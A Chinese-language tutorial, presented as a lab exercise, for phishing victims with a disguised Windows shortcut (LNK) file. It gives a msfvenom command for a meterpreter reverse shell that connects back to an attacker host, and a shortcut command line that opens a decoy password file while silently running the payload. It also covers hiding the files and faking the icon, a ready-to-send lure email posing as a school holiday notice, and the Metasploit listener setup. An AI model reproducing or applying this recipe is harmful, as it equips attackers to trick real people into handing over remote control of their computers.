社工钓鱼之Lnk钓鱼基本的方式
社工钓鱼之Lnk钓鱼基本的方式
1.1 前言
网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!
lnk 文件是用于指向其他文件的一种文件。 这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用…这里快捷方式在钓鱼的优势是,可以写入免杀的shell代码,双击即可执行,进一步的调节下图标后,能更好的诱骗客户执行
简单来说就是使用快捷方式执行cmd命令执行shell,从而诱导目标上钩
1.1.1 实验步骤
通过msfvemon生成一个后门文件,模拟《五一放假通知》诱导目标点击,通过msf监听上线,拿下目标主机shell权限,
准备环境: 外网ubantu(msf服务器) 、 模拟目标windows10 一台 、物理本机制作钓鱼文件。
(二)Ink快捷方式钓鱼
2.1 msfvemon生成木马
注:you_ip 为外网机器
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=you_ip LPORT=8080 -f exe > shell.exe |
2.2 文件准备
关于五一放假通知.docx 、shell.exe(msf生成)、 创建一个txt文件文件名为密码.txt ,创建密码.txt快捷方式,将word设置密码,从而诱导目标点击密码.txt
shell.exe、密码.txt设置为隐藏模式,密码内容为 pass:admin1234
设置world密码
将文件压缩:
(三) 快捷方式文件写入、图标更改
右键密码.txt快捷方式
1 | C:\Windows\System32\cmd.exe /c "cmd /c 密码.txt&shell.exe |
3.1 图标更改
右键属性–更改图标—选择跟txt文档一样的图标即可
(四)钓鱼邮箱拟写
钓鱼模板
亲爱的小张老师:
根据《国务院办公厅关于2024年部分节假日安排的通知》(国办发明电〔2023〕7号)精神,结合学校实际,现就2024年“五一”劳动节假期工作通知如下:
一、放假时间安排
5月1日至5日放假调休,共5天。4月28日(星期日)补5月2日(星期四)的课程、5月11日(星期六)补5月3日(星期五)的课程。
注意:具体细节请查看附件1
信息安全学院 信息中心
发给目标:
附件1为准备好的木马文件
(五)模拟接收文件
登录window10 发现有文件发送点开文件将附件下载下来
下载附件
结尾:msf上线
运行密码.txt 查看msf服务器上线,拿下 administrtor 管理员权限
msf监听:一套组合拳
1 | use exploit/multi/handler |
本次实验结束:
不足点:shell 没有进行免杀,如开启defender 等杀毒软件,shell直接被检测杀掉,
